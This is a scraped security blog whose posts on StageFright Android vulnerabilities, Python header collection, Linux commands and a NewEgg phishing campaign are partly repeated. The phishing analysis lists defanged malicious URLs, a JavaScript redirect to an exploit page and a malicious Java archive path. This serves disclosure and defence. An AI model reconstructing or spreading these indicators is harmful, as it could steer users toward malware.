A few updates to the Android StageFright vulnerability:
First, Google has promised a patch release for the issue this week, but where is it? Second, Samsung has been said to have released a patch for their applicable devices.
While blocking SMS/MMS messages from unknown sources is a great start, you should also disable automatic download of these messages. However, this will not fully protect you. Viewing a webpage with a specially-crafted malicious video can exploit the vulnerability as well. This really makes this issue a tricky one. How many users can really say they are able to identify a "sketchy" link or site with a high level of certainty? Not to mention, watering hole attacks and malvertising can throw that precautionary step right out the window.
Over at StackExchange, this post discusses a proof-of-concept mp4 video file that appears to exploit an overflow condition in one of the StageFright components. I cannot personally vouch for the file, but I did perform a brief analysis of it in a hex editor. It appears to define a field, named 'tx3g' that is very long, possibly causing the overflow condition. Details will be released over the next day or two by Joshua Drake aka JDuck, so expect more concrete PoC information to surface by weeks end.
Update: Below are links to the patches provided to Google for the issues. All of these are integer overflow or underflow issues.
https://android.googlesource.com/platform/frameworks/av/+/0e4e5a8%5E!/
https://android.googlesource.com/platform/frameworks/av/+/5c134e6%5E!/
https://android.googlesource.com/platform/frameworks/av/+/030d8d0%5E!/
Tuesday, August 4, 2015
Monday, July 27, 2015
StageFright: Critical Android MMS bug affects an estimated 95% of Android Devices
A flaw has been discovered affecting Android devices that allows an attacker to execute arbitrary code via a MMS message without user interaction. What does this mean? Someone, anyone. can send you a malicious MMS (SMS aka "text" message with multimedia attachment) that, upon receipt, will execute on your phone without you doing a single thing. Here is a more detailed read by the folks who discovered it. It will likely be referred to as "StageFright", as this is the back-end component that is affected. There were a total of 7 issues discovered, covered by the following CVE's:
Mitre: CVE-2015-1539
Mitre: CVE-2015-3824
Mitre: CVE-2015-3826
Mitre: CVE-2015-3827
Mitre: CVE-2015-3828
Mitre: CVE-2015-3829
How can I protect myself?
While a vendor patch is the only way to be fully protected, disabling auto receipt of MMS messages is one way to prevent the automatic execution of arbitrary code for this issue. I haven't seen this being talked about much yet, so spread the word!
In Hangouts:
Menu -> Settings -> SMS -> Auto retrieve MMS - uncheck this
In Messenger:
Menu -> Settings -> Advanced -> Auto-retrieve - turn this to 'off'
The bug finder, Joshua J. Drake (aka jduck), will be speaking at BlackHat 2015 about this issue in early August. Hopefully, patches will be delivered before then. At the very least, we all have a jump on this issue before it gets too ugly. Certainly, with the large number of devices affected and severity of the issue, it won't be long before exploit attempts will be observed in the wild. Be aware.
CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828
CVE-2015-3829 - See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/#sthash.fhyCvVdG.dpuf
CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828
CVE-2015-3829 - See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/#sthash.fhyCvVdG.dpuf
CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828
CVE-2015-3829 - See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/#sthash.fhyCvVdG.dpuf
Mitre: CVE-2015-1538Mitre: CVE-2015-1539
Mitre: CVE-2015-3824
Mitre: CVE-2015-3826
Mitre: CVE-2015-3827
Mitre: CVE-2015-3828
Mitre: CVE-2015-3829
How can I protect myself?
While a vendor patch is the only way to be fully protected, disabling auto receipt of MMS messages is one way to prevent the automatic execution of arbitrary code for this issue. I haven't seen this being talked about much yet, so spread the word!
In Hangouts:
Menu -> Settings -> SMS -> Auto retrieve MMS - uncheck this
In Messenger:
Menu -> Settings -> Advanced -> Auto-retrieve - turn this to 'off'
The bug finder, Joshua J. Drake (aka jduck), will be speaking at BlackHat 2015 about this issue in early August. Hopefully, patches will be delivered before then. At the very least, we all have a jump on this issue before it gets too ugly. Certainly, with the large number of devices affected and severity of the issue, it won't be long before exploit attempts will be observed in the wild. Be aware.
Friday, February 15, 2013
In love with Python
Valentine's Day has come and gone, but I'm still swooning. I'm enamored with Python. Yes, Python the programming language, not the animal. Why am I vying for Python's attention? Here's why...
import httplib
urlconn = httplib.HTTPConnection('www.somewhere');
urlconn.request("GET", "/somepath/to/login.asp");
response = urlconn.getresponse();
cookie = response.getheader('Set-Cookie');
print cookie;
urlconn.close();
If you run this code (with valid data, of course!), you would receive a response similar to the following:
ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCDS; path=/
With this tiny bit of code, we can gather session ID's from login pages for analysis. This data can be used to further assess the security of the login page. We can (and as it sits, will) collect other cookie information from this code. What else could we do here? A very simple change would allow us to collect other HTTP header information:
print response.getheader('Server');
This would return a response similar to the following:
Microsoft-IIS/6.0
We can also collect lots of other data, including the HTTP response code, other specific header data, or the full response itself.
Of course, this is a very rudimentary example that could be improved upon. We could implement a more flexible program by allowing the URL to be passed via command-line, implement error handling, and do something more useful with the output. For now, I'll leave this as an exercise for the reader. My point here is to illustrate how quickly one can create something useful and usable for a specific purpose.
Happy coding!
import httplib
urlconn = httplib.HTTPConnection('www.somewhere');
urlconn.request("GET", "/somepath/to/login.asp");
response = urlconn.getresponse();
cookie = response.getheader('Set-Cookie');
print cookie;
urlconn.close();
If you run this code (with valid data, of course!), you would receive a response similar to the following:
ASPSESSIONID=AOBPFCCDFKASLMRTYWKNBCDS; path=/
With this tiny bit of code, we can gather session ID's from login pages for analysis. This data can be used to further assess the security of the login page. We can (and as it sits, will) collect other cookie information from this code. What else could we do here? A very simple change would allow us to collect other HTTP header information:
print response.getheader('Server');
This would return a response similar to the following:
Microsoft-IIS/6.0
We can also collect lots of other data, including the HTTP response code, other specific header data, or the full response itself.
Of course, this is a very rudimentary example that could be improved upon. We could implement a more flexible program by allowing the URL to be passed via command-line, implement error handling, and do something more useful with the output. For now, I'll leave this as an exercise for the reader. My point here is to illustrate how quickly one can create something useful and usable for a specific purpose.
Happy coding!
Thursday, January 31, 2013
Four Linux Commands You Never Knew You Needed (Until Now)
If you're like me, you've probably used open source software such as Linux and GNU utilities for some time now. In recent years, I've been involved in more research and development activities. This has led to a combining of different schools of thought for me: that of the system administrator, and that of the developer or "power-user". I've compiled a few useful but lesser-known (at least to me) commands that I'd like to share that seem to have overlapped projects during the course of my work. These have all saved me time in some way.
watch
Sadly, the watch command is a newer discovery for me. This useful ncurses-based utility allows you to monitor activity generated by the output of other commands over time. Here's a quick example:
This will display the contents of the /tmp directory, refreshing it every 2 seconds. The refresh time is configurable via a parameter, i.e.:
The -n parameter takes input in seconds, thus the above command-line would generate output every 10 seconds. Using watch to monitor a directory for changes is useful in many scenarios. At times, I've found myself using this to monitor processes writing files. However, here's an example that I use even more frequently:
This effectively allows you to monitor the many states of open network sockets as they happen. While there are other tools that can do this (i.e. ntop), but the upside is that watch is included out-of-the-box in many Linux distros. Since we're only manipulating command-line parameters, the level of customization is very high. If you throw in an additional grep statement before grabbing the socket state, you can effectively filter on other criteria, such as IP addresses.
It's worth noting that you'll not need to include all of these socket states in most situations. If you're not having issues with connectivity on either end, you're likely to only observe ESTABLISHED and TIME_WAIT. For obvious reasons, I have found SYN_SENT useful for noting issues with remote hosts. The others are included for completeness.
whatis
Put quite simply, the whatis utility displays short summaries of man pages on the command-line.
Simple, but useful, right?
cal
As the name indicates, cal displays all or part of a calendar. While not an earth-shaking game-changer, the cal utility can be quite useful. Here are a few examples:
Display a full calendar for the year 2012: cal 2012
Display calendar for November 1955: cal 11 1955
Display calendar for the 8th month of the current year: cal -m 8
This can also be achieved via: cal 8 2013
Perhaps it's my nature in being a "CLI guy", but I much prefer this to clicking through any of the wonky date & time widgets. I also find this to be much faster than most GUI, especially when you're in need of a date many months or years from today. What day of the week is the wife's birthday next year? cal N 2014 - done!
lsblk
List block devices (aka lsblk) is part of the util-linux software package. While it's a relatively new utility to me, it certainly is useful. The default output of lsblk looks somewhat similar to df
$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 666.1M 1 loop /rofs
sda 8:0 0 465.8G 0 disk
├─sda1 8:1 0 39.2M 0 part
├─sda2 8:2 0 14.8G 0 part
└─sda3 8:3 0 450.9G 0 part
sr0 11:0 1 695.3M 0 rom /cdrom
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
/cow 1932460 395084 1537376 21% /
udev 1924792 4 1924788 1% /dev
tmpfs 772988 876 772112 1% /run
/dev/sr0 711980 711980 0 100% /cdrom
/dev/loop0 682240 682240 0 100% /rofs
tmpfs 1932460 156 1932304 1% /tmp
none 5120 4 5116 1% /run/lock
none 1932460 180 1932280 1% /run/shm
While the output of each utility is similar, there are some real differences. First, lsblk includes a very clear partition hierarchy in the NAME column. I find this to be very easy to read as well as convenient. Next, we have the MAJ and MIN columns, which refer to Linux device major and minor numbers. The RM and RO columns, which stand for 'removable' and 'read-only' respectively, are things I wish df had been telling me all along. The TYPE column is self explanatory, but is another example of output that I find to be useful.
While the default output of lsblk is great, it's also very customizable. The -o switch allows you to specify a comma-separated list of which columns are present in the output. Here's an example:
$ lsblk -o NAME,MODEL
NAME MODEL
loop0
sda WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0 DVD+-RW GH70N
This is definitely a convenient way to determine where physical disks are mapped. I no longer have to dig through dmesg output! Well... not for this reason, anyway.
If you're like me, you may have many physical systems for various reasons. Do you have a built-in multi-card reader on your PC? Do you remember which device maps to which type of reader? I don't.
$ lsblk -a -o NAME,MODEL
NAME MODEL
ram0
ram1
ram2
[ ... SNIP ... ]
loop7
sda WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0 DVD+-RW GH70N
sdb SD/MMC
sdc Compact Flash
sdd SM/xD Picture
sde MS/MS-Pro
Now I recall! The -a switch shows all devices. Note that the output has been trimmed. There are a lot of other columns available, including STATE, OWNER, GROUP, and MODE. Check lsblk --help for many more options.
That's all for now. I hope you find this information to be useful in your day-to-day CLI adventures.
watch
Sadly, the watch command is a newer discovery for me. This useful ncurses-based utility allows you to monitor activity generated by the output of other commands over time. Here's a quick example:
watch 'ls -la /tmp'
This will display the contents of the /tmp directory, refreshing it every 2 seconds. The refresh time is configurable via a parameter, i.e.:
watch -n 10 'ls -la /tmp'
The -n parameter takes input in seconds, thus the above command-line would generate output every 10 seconds. Using watch to monitor a directory for changes is useful in many scenarios. At times, I've found myself using this to monitor processes writing files. However, here's an example that I use even more frequently:
watch "netstat -na |egrep '(SYN_SENT|ESTABLISHED|TIME_WAIT|FIN_WAIT_1|FIN_WAIT_2)'"
This effectively allows you to monitor the many states of open network sockets as they happen. While there are other tools that can do this (i.e. ntop), but the upside is that watch is included out-of-the-box in many Linux distros. Since we're only manipulating command-line parameters, the level of customization is very high. If you throw in an additional grep statement before grabbing the socket state, you can effectively filter on other criteria, such as IP addresses.
 | |
| Figure 1: monitoring network sockets using 'watch'. |
It's worth noting that you'll not need to include all of these socket states in most situations. If you're not having issues with connectivity on either end, you're likely to only observe ESTABLISHED and TIME_WAIT. For obvious reasons, I have found SYN_SENT useful for noting issues with remote hosts. The others are included for completeness.
whatis
Put quite simply, the whatis utility displays short summaries of man pages on the command-line.
$ whatis whatis
whatis (1) - display manual page descriptions
cal
As the name indicates, cal displays all or part of a calendar. While not an earth-shaking game-changer, the cal utility can be quite useful. Here are a few examples:
Display a full calendar for the year 2012: cal 2012
Display calendar for November 1955: cal 11 1955
Display calendar for the 8th month of the current year: cal -m 8
This can also be achieved via: cal 8 2013
 |
| Figure 2: Demonstrating the 'cal' command. |
Perhaps it's my nature in being a "CLI guy", but I much prefer this to clicking through any of the wonky date & time widgets. I also find this to be much faster than most GUI, especially when you're in need of a date many months or years from today. What day of the week is the wife's birthday next year? cal N 2014 - done!
lsblk
List block devices (aka lsblk) is part of the util-linux software package. While it's a relatively new utility to me, it certainly is useful. The default output of lsblk looks somewhat similar to df
$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 666.1M 1 loop /rofs
sda 8:0 0 465.8G 0 disk
├─sda1 8:1 0 39.2M 0 part
├─sda2 8:2 0 14.8G 0 part
└─sda3 8:3 0 450.9G 0 part
sr0 11:0 1 695.3M 0 rom /cdrom
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
/cow 1932460 395084 1537376 21% /
udev 1924792 4 1924788 1% /dev
tmpfs 772988 876 772112 1% /run
/dev/sr0 711980 711980 0 100% /cdrom
/dev/loop0 682240 682240 0 100% /rofs
tmpfs 1932460 156 1932304 1% /tmp
none 5120 4 5116 1% /run/lock
none 1932460 180 1932280 1% /run/shm
While the output of each utility is similar, there are some real differences. First, lsblk includes a very clear partition hierarchy in the NAME column. I find this to be very easy to read as well as convenient. Next, we have the MAJ and MIN columns, which refer to Linux device major and minor numbers. The RM and RO columns, which stand for 'removable' and 'read-only' respectively, are things I wish df had been telling me all along. The TYPE column is self explanatory, but is another example of output that I find to be useful.
While the default output of lsblk is great, it's also very customizable. The -o switch allows you to specify a comma-separated list of which columns are present in the output. Here's an example:
$ lsblk -o NAME,MODEL
NAME MODEL
loop0
sda WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0 DVD+-RW GH70N
This is definitely a convenient way to determine where physical disks are mapped. I no longer have to dig through dmesg output! Well... not for this reason, anyway.
If you're like me, you may have many physical systems for various reasons. Do you have a built-in multi-card reader on your PC? Do you remember which device maps to which type of reader? I don't.
$ lsblk -a -o NAME,MODEL
NAME MODEL
ram0
ram1
ram2
[ ... SNIP ... ]
loop7
sda WDC WD5000AAKX-7
├─sda1
├─sda2
└─sda3
sr0 DVD+-RW GH70N
sdb SD/MMC
sdc Compact Flash
sdd SM/xD Picture
sde MS/MS-Pro
Now I recall! The -a switch shows all devices. Note that the output has been trimmed. There are a lot of other columns available, including STATE, OWNER, GROUP, and MODE. Check lsblk --help for many more options.
That's all for now. I hope you find this information to be useful in your day-to-day CLI adventures.
Wednesday, January 30, 2013
Best Albums for Writing Code
If you're like me, you probably code on a somewhat regular basis. I find myself having a reason to code a new tool, script, or web page on a weekly basis. What helps you focus and get you though the process? For me, music is the answer. I've created a collection on Referly of the best albums for writing code. Check it out here. Feel free to leave your comments about what music motivates you. I'd love to hear them.
Monday, April 9, 2012
NewEgg Phishing Scam leads to Java-based exploit?
If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.
(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, containing a Java applet. The file path is obfuscated, partially by hex entities. It loads with parameters:
hxxp://216[dot]224[do]182[dot]94/data/Klot.jar?a=1
It passes a "code" param, code="ta.tc". The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind. Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any good malware used in a phishing campaign should, this file receives a not-so-shocking 0/42. I wonder how many users clicked this? Luckily, the individuals who received this did not do so. Instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...
(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, containing a Java applet. The file path is obfuscated, partially by hex entities. It loads with parameters:
hxxp://216[dot]224[do]182[dot]94/data/Klot.jar?a=1
It passes a "code" param, code="ta.tc". The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind. Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any good malware used in a phishing campaign should, this file receives a not-so-shocking 0/42. I wonder how many users clicked this? Luckily, the individuals who received this did not do so. Instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...
Tuesday, March 20, 2012
Greetings to sympt0m
My friend David Keaton, aka sympt0m has created a blog. I'm excited to see what he has to say. I'm ready to absorb that reverse engineering knowledge you have, buddy. Let it fly!
Subscribe to:
Posts (Atom)